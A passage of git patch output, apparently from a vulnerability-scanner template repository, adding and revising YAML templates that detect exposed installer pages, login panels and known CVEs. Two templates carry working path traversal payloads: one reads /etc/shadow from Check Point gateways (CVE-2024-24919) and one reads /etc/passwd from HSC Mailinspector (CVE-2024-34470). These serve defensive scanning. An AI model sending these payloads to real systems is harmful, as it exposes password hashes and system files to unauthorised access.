part: body group: 1 regex: - - '(?i)Login\s+-\s+Oracle\s+Access\s+Management\s+([a-z0-9]+)' \ No newline at end of file + - '(?i)Login\s+-\s+Oracle\s+Access\s+Management\s+([a-z0-9]+)' From 374338daa52164e0f72456837bb48eaf85c253ce Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 23:02:48 +0530 Subject: [PATCH 1533/1768] Create wowonder-installer.yaml --- .../installer/wowonder-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/wowonder-installer.yaml diff --git a/http/misconfiguration/installer/wowonder-installer.yaml b/http/misconfiguration/installer/wowonder-installer.yaml new file mode 100644 index 0000000000..a038f43ab2 --- /dev/null +++ b/http/misconfiguration/installer/wowonder-installer.yaml @@ -0,0 +1,31 @@ +id: wowonder-installer + +info: + name: WoWonder Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed WoWonder installation page. + reference: + - https://www.wowonder.com/ + metadata: + verified: true + max-request: 1 + fofa-query: body="WoWonder | Installation" + tags: misconfig,install,exposure,wowonder + +http: + - method: GET + path: + - "{{BaseURL}}/install/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "WoWonder | Installation" + + - type: status + status: + - 200 From ab6ccf2b623178c5bc321617bb637f10cf5a2b29 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 29 May 2024 19:56:37 +0200 Subject: [PATCH 1534/1768] Add files via upload --- http/exposed-panels/oracle-business-control.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/oracle-business-control.yaml b/http/exposed-panels/oracle-business-control.yaml index 38ac27fff1..52e2cbbe39 100644 --- a/http/exposed-panels/oracle-business-control.yaml +++ b/http/exposed-panels/oracle-business-control.yaml @@ -2,9 +2,11 @@ id: oracle-business-control info: name: Oracle Commerce Business Control Center Login Panel - Detect - author: dhiyaneshDk + author: dhiyaneshDk,righettod severity: info description: Oracle Commerce Business Control Center login panel was detected. + reference: + - https://docs.oracle.com/cd/E23095_01/Platform.93/ATGBCCAdminGuide/html/s0101introductiontotheatgbusinesscont01.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 @@ -20,14 +22,19 @@ http: - method: GET path: - '{{BaseURL}}/atg/bcc' + - '{{BaseURL}}/atg/user/html/login.jsp' + + stop-at-first-match: true matchers-condition: and matchers: - type: word words: - 'Oracle Commerce Business Control Center' + - '/atg/userprofiling/InternalProfileFormHandler.loginSuccessURL' + - '/atg/userprofiling/InternalProfileFormHandler.loginErrorURL' + condition: or - type: status status: - 200 -# digest: 490a00463044022053e01b77ea1a1e685d1db0bf5c04bdd1ec7c937037c1f0a468192cfe1a0ce40e022027ac62488ae6b091b8ec611d2ea461fed923362a0d494718b77a4c1e75656ab7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 8dafd9c15e6be2158bdd78da6fd8289f52cd8c04 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Wed, 29 May 2024 20:04:14 +0200 Subject: [PATCH 1535/1768] Fix linter error --- http/exposed-panels/oracle-business-control.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/oracle-business-control.yaml b/http/exposed-panels/oracle-business-control.yaml index 52e2cbbe39..a9d286a7a3 100644 --- a/http/exposed-panels/oracle-business-control.yaml +++ b/http/exposed-panels/oracle-business-control.yaml @@ -23,7 +23,7 @@ http: path: - '{{BaseURL}}/atg/bcc' - '{{BaseURL}}/atg/user/html/login.jsp' - + stop-at-first-match: true matchers-condition: and From 650be8a0f2b226623f3c138b5b6b0918b8620518 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 23:37:39 +0530 Subject: [PATCH 1536/1768] Create call-com-installer.yaml --- .../installer/call-com-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/call-com-installer.yaml diff --git a/http/misconfiguration/installer/call-com-installer.yaml b/http/misconfiguration/installer/call-com-installer.yaml new file mode 100644 index 0000000000..f704504891 --- /dev/null +++ b/http/misconfiguration/installer/call-com-installer.yaml @@ -0,0 +1,31 @@ +id: call-com-installer + +info: + name: Call.com Setup Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed Call.com Setup page. + reference: + - https://cal.com/ + metadata: + verified: true + max-request: 1 + fofa-query: body="Setup | Cal.com" + tags: misconfig,install,exposure,cal + +http: + - method: GET + path: + - "{{BaseURL}}/auth/setup" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Setup | Cal.com" + + - type: status + status: + - 200 From 9c4ac9fc42d2bd2e144cfc3205a69a4933c97791 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 23:40:27 +0530 Subject: [PATCH 1537/1768] added negative matcher --- http/misconfiguration/installer/call-com-installer.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/http/misconfiguration/installer/call-com-installer.yaml b/http/misconfiguration/installer/call-com-installer.yaml index f704504891..065ca347a8 100644 --- a/http/misconfiguration/installer/call-com-installer.yaml +++ b/http/misconfiguration/installer/call-com-installer.yaml @@ -26,6 +26,12 @@ http: words: - "Setup | Cal.com" + - type: word + part: body + words: + - "You have already created an administrator user" + negative: true + - type: status status: - 200 From f7fc77cb5f192e4ecd529811b0a93e6a4b944105 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 23:45:07 +0530 Subject: [PATCH 1538/1768] minor update --- http/misconfiguration/installer/call-com-installer.yaml | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/http/misconfiguration/installer/call-com-installer.yaml b/http/misconfiguration/installer/call-com-installer.yaml index 065ca347a8..75c0bb2f99 100644 --- a/http/misconfiguration/installer/call-com-installer.yaml +++ b/http/misconfiguration/installer/call-com-installer.yaml @@ -25,12 +25,8 @@ http: part: body words: - "Setup | Cal.com" - - - type: word - part: body - words: - - "You have already created an administrator user" - negative: true + - "Minimum 15 characters long" + condition: and - type: status status: From 7a463330805e431e2c807163ace941d8871b9055 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 30 May 2024 02:54:11 +0530 Subject: [PATCH 1539/1768] Update CVE-2021-29625.yaml --- http/cves/2021/CVE-2021-29625.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml index 8d1ab155a5..178b6cad21 100644 --- a/http/cves/2021/CVE-2021-29625.yaml +++ b/http/cves/2021/CVE-2021-29625.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: adminer product: adminer - tags: cve2021,cve,adminer,xss,sqli + tags: cve2021,cve,adminer,xss http: - method: GET @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203bbedb78e2e0bddd6d7b3eefa0c1fca62d18deb2759881cb15089fbac64253a0022100cc7857e4cfd08807f6efcec5c623f04693979c11de46feee3edb0b5ec2ba53db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203bbedb78e2e0bddd6d7b3eefa0c1fca62d18deb2759881cb15089fbac64253a0022100cc7857e4cfd08807f6efcec5c623f04693979c11de46feee3edb0b5ec2ba53db:922c64590222798bb761d5b6d8e72950 From f9640348105ee0d858e6be1701cfff3b03de2e9e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 30 May 2024 02:55:41 +0530 Subject: [PATCH 1540/1768] Update CVE-2023-3345.yaml --- http/cves/2023/CVE-2023-3345.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml index 2d92d84f95..5fdc791a55 100644 --- a/http/cves/2023/CVE-2023-3345.yaml +++ b/http/cves/2023/CVE-2023-3345.yaml @@ -29,7 +29,7 @@ info: vendor: masteriyo product: masteriyo framework: wordpress - tags: cve2023,cve,wp-plugin,xss,wp,wordpress,exposure,authenticated,learning-management-system,wpscan,masteriyo + tags: cve2023,cve,wp-plugin,wp,wordpress,exposure,authenticated,learning-management-system,wpscan,masteriyo http: - raw: @@ -75,4 +75,4 @@ http: regex: - '"nonce":"([a-z0-9]+)","versionString' internal: true -# digest: 490a0046304402204cddd6c9737174b06878b047f621154b32a59366060b58df57cbb1318e18e4e1022059195669346394d99d71b58326ae9be8679220489112cbd7e6e09528a8ab05a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204cddd6c9737174b06878b047f621154b32a59366060b58df57cbb1318e18e4e1022059195669346394d99d71b58326ae9be8679220489112cbd7e6e09528a8ab05a6:922c64590222798bb761d5b6d8e72950 From c226ece895c8e4e6aec22aff66f21e5b8b70e08e Mon Sep 17 00:00:00 2001 From: johnk3r Date: Thu, 30 May 2024 00:36:42 -0300 Subject: [PATCH 1541/1768] Create CVE-2024-24919.yaml --- http/cves/2024/CVE-2024-24919.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/cves/2024/CVE-2024-24919.yaml diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml new file mode 100644 index 0000000000..2571e44fcf --- /dev/null +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -0,0 +1,29 @@ +id: CVE-2024-24919 + +info: + name: WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion + author: johnk3r + severity: medium + metadata: + max-request: 1 + vendor: checkpoint + tags: cve,cve2024,checkpoint + +http: + - method: POST + path: + - "{{BaseURL}}/clients/MyCRL" + + body: 'aCSHELL/../../../../../../../etc/shadow' + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:" + - "cpep_user:" + + - type: status + status: + - 200 From 03e7aa0bc8bc618af629073ce6e9bf9bc7a353cd Mon Sep 17 00:00:00 2001 From: johnk3r Date: Thu, 30 May 2024 00:38:13 -0300 Subject: [PATCH 1542/1768] Update CVE-2024-24919.yaml --- http/cves/2024/CVE-2024-24919.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 2571e44fcf..9dc5043337 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -1,7 +1,7 @@ id: CVE-2024-24919 info: - name: WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion + name: CVE-2024-24919 author: johnk3r severity: medium metadata: From 00be053b247495a14d7907cd8f3cf532ac626f4e Mon Sep 17 00:00:00 2001 From: johnk3r Date: Thu, 30 May 2024 00:48:57 -0300 Subject: [PATCH 1543/1768] Update CVE-2024-24919.yaml --- http/cves/2024/CVE-2024-24919.yaml | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 9dc5043337..287af21066 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -1,9 +1,13 @@ id: CVE-2024-24919 info: - name: CVE-2024-24919 + name: Check Point R81, R80, R77, R75 - Arbitrary File Read author: johnk3r - severity: medium + severity: high + description: | + CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade. + reference: + - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/ metadata: max-request: 1 vendor: checkpoint @@ -21,8 +25,12 @@ http: - type: regex part: body regex: - - "root:" - - "cpep_user:" + - "monitor:\\*:" + - "root:\\*:" + - "cp_routeevt:\\*:" + - "cp_postgres:\\*:" + - "cp_extensions:\\*:" + - "cpep_user:\\*:" - type: status status: From 90fa6e4bb7334157441bd1ed729703b76162a219 Mon Sep 17 00:00:00 2001 From: johnk3r Date: Thu, 30 May 2024 01:33:41 -0300 Subject: [PATCH 1544/1768] Update CVE-2024-24919.yaml --- http/cves/2024/CVE-2024-24919.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 287af21066..d309063bbe 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -8,6 +8,7 @@ info: CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade. reference: - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/ + - https://support.checkpoint.com/results/sk/sk182337 metadata: max-request: 1 vendor: checkpoint From fb94f652fd487175bf10659ad0d0a7d1c3ea3aff Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 30 May 2024 10:22:03 +0530 Subject: [PATCH 1545/1768] matcher - update --- http/cves/2024/CVE-2024-24919.yaml | 20 +++++++++----------- 1 file changed, 9 insertions(+), 11 deletions(-) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index d309063bbe..1274372024 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -15,24 +15,22 @@ info: tags: cve,cve2024,checkpoint http: - - method: POST - path: - - "{{BaseURL}}/clients/MyCRL" + - raw: + - | + POST /clients/MyCRL HTTP/1.1 + Host: {{Hostname}} - body: 'aCSHELL/../../../../../../../etc/shadow' + aCSHELL/../../../../../../../etc/shadow matchers-condition: and matchers: - type: regex part: body regex: - - "monitor:\\*:" - - "root:\\*:" - - "cp_routeevt:\\*:" - - "cp_postgres:\\*:" - - "cp_extensions:\\*:" - - "cpep_user:\\*:" + - "root:" + - "nobody:" + conditio: and - type: status status: - - 200 + - 200 \ No newline at end of file From 577d44cf54a314c569451f1fd53aaad81547153a Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 30 May 2024 14:22:10 +0530 Subject: [PATCH 1546/1768] Update CVE-2024-24919.yaml --- http/cves/2024/CVE-2024-24919.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 1274372024..e39e9051bc 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -29,7 +29,7 @@ http: regex: - "root:" - "nobody:" - conditio: and + condition: and - type: status status: From 53840d6582ee56841aa8a05f3370558a9196a693 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 30 May 2024 15:09:10 +0530 Subject: [PATCH 1547/1768] metadata update --- http/cves/2024/CVE-2024-24919.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index e39e9051bc..8445b9b281 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -12,7 +12,9 @@ info: metadata: max-request: 1 vendor: checkpoint - tags: cve,cve2024,checkpoint + product: quantum_security_gateway + cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:* + tags: cve,cve2024,checkpoint,lfi http: - raw: From d861c7f5d6ea6ce9a6486899e538c63c1143920a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 30 May 2024 16:47:43 +0530 Subject: [PATCH 1548/1768] minor update --- http/cves/2024/CVE-2024-24919.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 8445b9b281..d6def5b623 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -1,7 +1,7 @@ id: CVE-2024-24919 info: - name: Check Point R81, R80, R77, R75 - Arbitrary File Read + name: Check Point Quantum Gateway - Information Disclosure author: johnk3r severity: high description: | @@ -14,6 +14,8 @@ info: vendor: checkpoint product: quantum_security_gateway cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:* + shodan-query: html:"Check Point SSL Network" + verified: true tags: cve,cve2024,checkpoint,lfi http: @@ -35,4 +37,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 From cfba91fbf9f10d16aac9af629db895d650c4e54e Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 11:23:04 +0000 Subject: [PATCH 1549/1768] Auto Generated New Template Addition List [Thu May 30 11:23:04 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 742727d535..f202846ea8 100644 --- a/.new-additions +++ b/.new-additions @@ -5,6 +5,7 @@ http/cves/2023/CVE-2023-2059.yaml http/cves/2023/CVE-2023-3077.yaml http/cves/2023/CVE-2023-48084.yaml http/cves/2024/CVE-2024-21683.yaml +http/cves/2024/CVE-2024-24919.yaml http/cves/2024/CVE-2024-3495.yaml http/cves/2024/CVE-2024-5230.yaml http/default-logins/ampjuke-default-login.yaml From bea1f258a2b294052f655fc63dd76cdf94617cc6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 11:23:17 +0000 Subject: [PATCH 1550/1768] Auto Generated Templates Checksum [Thu May 30 11:23:17 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 96efa4f5fd..4ea4c20edc 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3277,6 +3277,7 @@ http/cves/2024/CVE-2024-2340.yaml:bf15cb04b444f7c09b0602e12e9bb3c77cd7ecf7 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 http/cves/2024/CVE-2024-23917.yaml:91acf4a916db564da116aad3221f1a662477c3ed http/cves/2024/CVE-2024-24131.yaml:71f3b885b69ae4e2beffc8df3a036dcfc75a8cba +http/cves/2024/CVE-2024-24919.yaml:ee64c8928f658d9ebe13a63a69bba14970c11dcc http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:970b706816344e71cfc971f7e2b69be44296cd81 http/cves/2024/CVE-2024-25735.yaml:f7694e6ddea1f334810c1f92161b65fe17c5881c @@ -3311,7 +3312,7 @@ http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b -http/cves/2024/CVE-2024-4956.yaml:d307ad589d80f512df4bfa2bc2f7f727eb32f050 +http/cves/2024/CVE-2024-4956.yaml:a00f92400517494320ec968d237c98bb1056de25 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce @@ -8601,7 +8602,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:696e9190411f7f7ecfff24945eade5e5c370d56a +templates-checksum.txt:7d418f68098a78147763158f6b9d99bf8f1ac69d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d679722d904bb014d9a396ecbe447c30d03c6fb8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 11:23:45 +0000 Subject: [PATCH 1551/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b1b12f984b..26873904a6 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -10,6 +10,7 @@ on: - 'http/cves/2023/CVE-2023-3077.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/cves/2024/CVE-2024-21683.yaml' + - 'http/cves/2024/CVE-2024-24919.yaml' - 'http/cves/2024/CVE-2024-3495.yaml' - 'http/cves/2024/CVE-2024-5230.yaml' - 'http/default-logins/ampjuke-default-login.yaml' From 507e4856283ea7179dab215ddc52683d0fbedd7f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 11:25:03 +0000 Subject: [PATCH 1552/1768] Auto Template Signing [Thu May 30 11:25:03 UTC 2024] :robot: --- http/cves/2024/CVE-2024-24919.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index d6def5b623..65c258a931 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -38,3 +38,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502204c9518dd059877a34844f2e2842d83fd41e2ad0697ab8806694bb9de593e5d4902210097a7f34cde999f290f86e0ea7544cfc1279e367211e05a8f2944fd8c46d352f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From dd76bbf18d5064cb16ab62b18a13b415abc6bf0a Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 30 May 2024 17:34:18 +0530 Subject: [PATCH 1553/1768] Create CVE-2024-34470.yaml --- http/cves/2024/CVE-2024-34470.yaml | 49 ++++++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 http/cves/2024/CVE-2024-34470.yaml diff --git a/http/cves/2024/CVE-2024-34470.yaml b/http/cves/2024/CVE-2024-34470.yaml new file mode 100644 index 0000000000..5debe0b30e --- /dev/null +++ b/http/cves/2024/CVE-2024-34470.yaml @@ -0,0 +1,49 @@ +id: CVE-2024-34470 + +info: + name: HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion + author: topscoder + severity: high + description: | + An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server. + reference: + - https://github.com/osvaldotenorio/CVE-2024-34470 + - https://github.com/nomi-sec/PoC-in-GitHub + - https://github.com/fkie-cad/nvd-json-data-feeds + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + epss-score: 0.00043 + epss-percentile: 0.0866 + metadata: + max-request: 1 + fofa-query: "mailinspector/public" + tags: cve,cve2024,lfi,mailinspector,hsc + +http: + - method: GET + path: + - "{{BaseURL}}/mailinspector/login.php" + + host-redirects: true + matchers: + - type: word + part: body + words: + - "Licensed to HSC TREINAMENTO" + + - method: GET + path: + - "{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 From 5ff8b075e8fe05f84915afe450ec655fcf16e64a Mon Sep 17 00:00:00 2001 From: Paul Werther Date: Thu, 30 May 2024 14:47:16 +0200 Subject: [PATCH 1554/1768] Add new path for phpmyadmin (#9942) --- http/exposed-panels/phpmyadmin-panel.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/phpmyadmin-panel.yaml b/http/exposed-panels/phpmyadmin-panel.yaml index 210bbb9c66..3ca4c0005b 100644 --- a/http/exposed-panels/phpmyadmin-panel.yaml +++ b/http/exposed-panels/phpmyadmin-panel.yaml @@ -35,6 +35,7 @@ http: - "/web/phpmyadmin/" - "/xampp/phpmyadmin/" - "/phpMyAdmin/" + - "/phpma/" stop-at-first-match: true matchers: @@ -49,4 +50,4 @@ http: group: 1 regex: - 'v=([a-z0-9-._]+)' -# digest: 490a0046304402206d90224ba8f372bdc9b38b257f69f8c77e5c0a914af058f064ba7dd95a08da9102202872893647242184b043cdcc9dd82ea6bfa2165130f30c89737175e8441fe7b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206d90224ba8f372bdc9b38b257f69f8c77e5c0a914af058f064ba7dd95a08da9102202872893647242184b043cdcc9dd82ea6bfa2165130f30c89737175e8441fe7b0:922c64590222798bb761d5b6d8e72950 From 19f0cc60ad53c9b4ba0e414ad3e8f3bed0d8cb88 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 12:47:45 +0000 Subject: [PATCH 1556/1768] Auto Generated Templates Checksum [Thu May 30 12:47:45 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4ea4c20edc..579e8f0641 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3277,7 +3277,7 @@ http/cves/2024/CVE-2024-2340.yaml:bf15cb04b444f7c09b0602e12e9bb3c77cd7ecf7 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 http/cves/2024/CVE-2024-23917.yaml:91acf4a916db564da116aad3221f1a662477c3ed http/cves/2024/CVE-2024-24131.yaml:71f3b885b69ae4e2beffc8df3a036dcfc75a8cba -http/cves/2024/CVE-2024-24919.yaml:ee64c8928f658d9ebe13a63a69bba14970c11dcc +http/cves/2024/CVE-2024-24919.yaml:6e739858871f091c64f572ebffcb7df982653993 http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:970b706816344e71cfc971f7e2b69be44296cd81 http/cves/2024/CVE-2024-25735.yaml:f7694e6ddea1f334810c1f92161b65fe17c5881c @@ -4234,7 +4234,7 @@ http/exposed-panels/php-mailer.yaml:aea625363805a59d157fc0c8fbd98520a658bf37 http/exposed-panels/phpcollab-panel.yaml:00191ff5433780217091e63a42f9a512150ea763 http/exposed-panels/phpldapadmin-panel.yaml:6a326c69ae4087643893609ba63387f5f616cb80 http/exposed-panels/phpminiadmin-panel.yaml:18f7bdeebcddc43b09d75b6430ad561859f97d14 -http/exposed-panels/phpmyadmin-panel.yaml:2d9bff14aecf79c5de71fa8868106d05dd97a01a +http/exposed-panels/phpmyadmin-panel.yaml:465455c9b8ced4f37391fa62b05c96f27c8fa879 http/exposed-panels/phppgadmin-panel.yaml:b644fb2f3c82f4cf2e6acc48ed9502547d0dabe3 http/exposed-panels/pichome-panel.yaml:de9c307297bd6bee1395daea5bf78a75d03462c4 http/exposed-panels/piwigo-panel.yaml:3bdd638ad47c8660f72afd63183653e1bbc01788 @@ -8602,7 +8602,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7d418f68098a78147763158f6b9d99bf8f1ac69d +templates-checksum.txt:24a6d6f26bc3b10881dd3b34c8829a2c4198f189 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7b6d4e69a1e2d001c5c6d1096b9b139fbe05f818 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 12:49:31 +0000 Subject: [PATCH 1557/1768] Auto Template Signing [Thu May 30 12:49:31 UTC 2024] :robot: --- http/exposed-panels/phpmyadmin-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/phpmyadmin-panel.yaml b/http/exposed-panels/phpmyadmin-panel.yaml index 3ca4c0005b..0147c6c7e9 100644 --- a/http/exposed-panels/phpmyadmin-panel.yaml +++ b/http/exposed-panels/phpmyadmin-panel.yaml @@ -50,4 +50,4 @@ http: group: 1 regex: - 'v=([a-z0-9-._]+)' -# digest: 490a0046304402206d90224ba8f372bdc9b38b257f69f8c77e5c0a914af058f064ba7dd95a08da9102202872893647242184b043cdcc9dd82ea6bfa2165130f30c89737175e8441fe7b0:922c64590222798bb761d5b6d8e72950 +# digest: 